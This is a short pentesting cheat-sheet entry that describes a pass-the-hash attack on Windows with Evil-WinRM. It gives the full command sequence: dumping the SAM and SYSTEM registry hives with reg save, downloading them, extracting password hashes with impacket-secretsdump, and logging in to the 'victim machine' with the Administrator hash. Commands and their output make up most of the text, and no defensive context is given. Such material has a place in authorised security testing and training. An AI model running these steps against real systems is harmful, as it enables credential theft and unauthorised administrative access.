Pass the hash with evil WinRM

If you have admin access or privileges to dump the SAM and SYSTEM hives with Evil-WinRM, you can perform Pass-the-Hash to connect to the victim machine with elevated privileges:

1. First, save the SAM and SYSTEM hives using Reg in the Windows machine:

   Copy

   Evil-WinRM PS C:\> reg save hklm\system system.bak
   The operation completed successfully.
   
   Evil-WinRM PS C:\> reg save hklm\sam sam.bak
   The operation completed successfully.

• Download the saved hives to your local machine:

  Copy

  Evil-WinRM PS C:\> download system.bak
  Info: Download successful!
  
  Evil-WinRM PS C:\> download sam.bak
  Info: Download successful!

• Next, use a tool like Impacket's secretsdump.py to extract the hashes from the SAM and SYSTEM hives:

  Copy

  impacket-secretsdump -sam sam.bak -system system.bak LOCAL

• After extracting the hashes, you'll obtain the hash for the Administrator account.

• Finally, perform Pass-the-Hash to connect to the victim machine using Evil-WinRM.

  Copy

  evil-winrm -i [Target IP] -u [User(usually Administrator)] -H [Administrator_Hash]